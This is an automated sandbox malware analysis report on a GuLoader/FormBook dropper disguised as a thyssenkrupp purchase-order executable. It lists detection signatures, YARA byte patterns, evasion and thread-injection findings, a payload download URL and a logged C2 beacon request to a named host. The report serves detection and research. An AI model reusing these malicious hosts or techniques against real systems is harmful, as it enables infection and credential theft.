Loading ...

Play interactive tourEdit tour

Analysis Report Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe

Overview

General Information

Sample Name:Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
Analysis ID:321085
MD5:6008cd180e677be4846d5f8abfa6b983
SHA1:881844503dee7d1797ce7736786dfec08f06100a
SHA256:b8b07584a493c32a6f045b8bfe1f7ce2a2e441035a7048e946aa6b26a6485c0d
Tags:exeGuLoader

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Executable has a suspicious name (potential lure to open the executable)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c30a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183e9:$sqlite3step: 68 34 1C 7B E1
    • 0x184fc:$sqlite3step: 68 34 1C 7B E1
    • 0x18418:$sqlite3text: 68 38 2A 90 C5
    • 0x1853d:$sqlite3text: 68 38 2A 90 C5
    • 0x1842b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18553:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c30a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeVirustotal: Detection: 30%Perma Link
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeReversingLabs: Detection: 14%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.921197000.0000000002E70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.757374606.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.761692759.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 4x nop then jne 021F9072h0_2_021F879F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 4x nop then jne 021F9072h0_2_021F907D
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 4x nop then pop ebx1_2_000A7AFB
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 4x nop then pop edi1_2_000AE450
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 4x nop then pop edi1_2_000B7D4A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop ebx6_2_02967AFB
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi6_2_0296E450
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi6_2_02977D4A
      Source: global trafficHTTP traffic detected: GET /ca5e/?9rmT0Zz8=33d4ALcEm9QS3ETZfm99n5/91vkYSjLj82bPV1gW1bkPYk/ky+qZQnI1oXWMSZEPGOwK&rZ=Xn8pd6vp HTTP/1.1Host: www.yourdfwliving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 64.98.145.30 64.98.145.30
      Source: Joe Sandbox ViewIP Address: 64.98.145.30 64.98.145.30
      Source: Joe Sandbox ViewASN Name: TUCOWS-3CA TUCOWS-3CA
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /ca5e/?9rmT0Zz8=33d4ALcEm9QS3ETZfm99n5/91vkYSjLj82bPV1gW1bkPYk/ky+qZQnI1oXWMSZEPGOwK&rZ=Xn8pd6vp HTTP/1.1Host: www.yourdfwliving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
      Source: unknownDNS traffic detected: queries for: pilatescollective.com
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: explorer.exe, 00000004.00000000.720261715.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000004.00000000.741826689.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://help.hover.com/home?source=parked
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.757436469.0000000000563000.00000040.00000001.sdmpString found in binary or memory: https://pilatescollective.com/myguy/anyiba_ivtYLdKxk45.bin
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/hover
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://www.hover.com/?source=parked
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://www.hover.com/about?source=parked
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=parked
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://www.hover.com/domains/results
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://www.hover.com/email?source=parked
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://www.hover.com/privacy?source=parked
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://www.hover.com/renew?source=parked
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://www.hover.com/tools?source=parked
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://www.hover.com/tos?source=parked
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=parked
      Source: cmstp.exe, 00000006.00000002.922184165.00000000054EF000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.921197000.0000000002E70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.757374606.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.761692759.000000001E150000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.921197000.0000000002E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.921197000.0000000002E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.922109924.0000000004FFF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000001.00000002.757374606.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.757374606.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.761692759.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.761692759.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.921254049.0000000002EBE000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Executable has a suspicious name (potential lure to open the executable)Show sources
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeStatic file information: Suspicious name
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F0A52 NtSetInformationThread,TerminateProcess,0_2_021F0A52
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F969C NtResumeThread,0_2_021F969C
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F075B EnumWindows,NtSetInformationThread,0_2_021F075B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F47EE NtSetInformationThread,CreateFileA,0_2_021F47EE
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9163 NtProtectVirtualMemory,0_2_021F9163
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F559F NtSetInformationThread,NtWriteVirtualMemory,0_2_021F559F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F8987 NtSetInformationThread,NtWriteVirtualMemory,0_2_021F8987
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F361D NtWriteVirtualMemory,0_2_021F361D
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9A19 NtResumeThread,0_2_021F9A19
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9A3D NtResumeThread,0_2_021F9A3D
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F3A2B NtWriteVirtualMemory,0_2_021F3A2B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F364F NtWriteVirtualMemory,0_2_021F364F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9A77 NtResumeThread,0_2_021F9A77
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9AB0 NtResumeThread,0_2_021F9AB0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F6AA9 NtSetInformationThread,0_2_021F6AA9
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F96A3 NtResumeThread,0_2_021F96A3
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9ADD NtResumeThread,0_2_021F9ADD
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F36D7 NtWriteVirtualMemory,0_2_021F36D7
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F96D7 NtResumeThread,0_2_021F96D7
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F06D5 EnumWindows,NtSetInformationThread,0_2_021F06D5
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F3717 NtWriteVirtualMemory,0_2_021F3717
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9B33 NtResumeThread,0_2_021F9B33
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F3B2B NtWriteVirtualMemory,0_2_021F3B2B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F3B7B NtWriteVirtualMemory,0_2_021F3B7B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9B6D NtResumeThread,0_2_021F9B6D
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F976B NtResumeThread,0_2_021F976B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F0769 EnumWindows,NtSetInformationThread,0_2_021F0769
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F879F NtProtectVirtualMemory,0_2_021F879F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F2F90 NtWriteVirtualMemory,0_2_021F2F90
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F37B7 NtWriteVirtualMemory,0_2_021F37B7
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9BAC NtResumeThread,0_2_021F9BAC
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F3BC5 NtWriteVirtualMemory,0_2_021F3BC5
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F380B NtWriteVirtualMemory,0_2_021F380B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F0808 NtSetInformationThread,0_2_021F0808
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F3C35 NtWriteVirtualMemory,0_2_021F3C35
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F3855 NtWriteVirtualMemory,0_2_021F3855
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9C7F NtResumeThread,0_2_021F9C7F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F986F NtResumeThread,0_2_021F986F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F0897 NtSetInformationThread,0_2_021F0897
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F3C97 NtWriteVirtualMemory,0_2_021F3C97
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F38B5 NtWriteVirtualMemory,0_2_021F38B5
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F98A4 NtResumeThread,0_2_021F98A4
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F08CF NtSetInformationThread,0_2_021F08CF
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F90CB NtProtectVirtualMemory,0_2_021F90CB
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F38F5 NtWriteVirtualMemory,0_2_021F38F5
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F391A NtWriteVirtualMemory,0_2_021F391A
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F6515 NtSetInformationThread,0_2_021F6515
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F3D3B NtWriteVirtualMemory,0_2_021F3D3B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9956 NtResumeThread,0_2_021F9956
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F3962 NtWriteVirtualMemory,0_2_021F3962
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F3D8F NtWriteVirtualMemory,0_2_021F3D8F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9189 NtProtectVirtualMemory,0_2_021F9189
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F31E0 NtSetInformationThread,0_2_021F31E0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_1E3E9660
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_1E3E96E0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk,1_2_1E3E9710
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_1E3E97A0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk,1_2_1E3E9780
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9540 NtReadFile,LdrInitializeThunk,1_2_1E3E9540
